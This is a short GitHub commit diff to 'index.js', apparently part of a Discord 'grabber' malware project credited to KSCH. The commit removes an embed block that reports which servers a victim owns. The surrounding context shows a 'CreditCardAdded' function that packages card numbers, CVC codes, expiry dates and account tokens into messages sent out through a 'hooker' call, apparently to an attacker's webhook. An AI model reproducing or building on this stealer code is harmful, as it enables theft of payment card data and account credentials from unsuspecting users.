Update index.js

This commit is contained in:
What about KSCH 2022-11-22 10:04:20 +01:00 committed by GitHub
parent 17d7ebe5e6
commit 758ac6a321
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 15 deletions

View File

@ -1275,21 +1275,6 @@ async function CreditCardAdded(number, cvc, expir_month, expir_year, token) {
"url": "https://cdn.discordapp.com/avatars/" + info.id + "/" + info.avatar
},
},
{
"title": `<a:totalfriends:1041641100017946685> Guilds Owner`,
"color": config['embed-color'],
"description": `\`\`\`diff\n${fs.readFileSync('blackcaped_guilds_result.txt', 'utf-8') || "- This user is not the owner of any server"}\`\`\``,
"footer": {
"text": "©KSCH | https://github.com/KSCHdsc"
},
"image": {
'url': `${bannerurl}`,
},
"thumbnail": {
"url": `${usericonurl}`
}
}
]
}
hooker(params)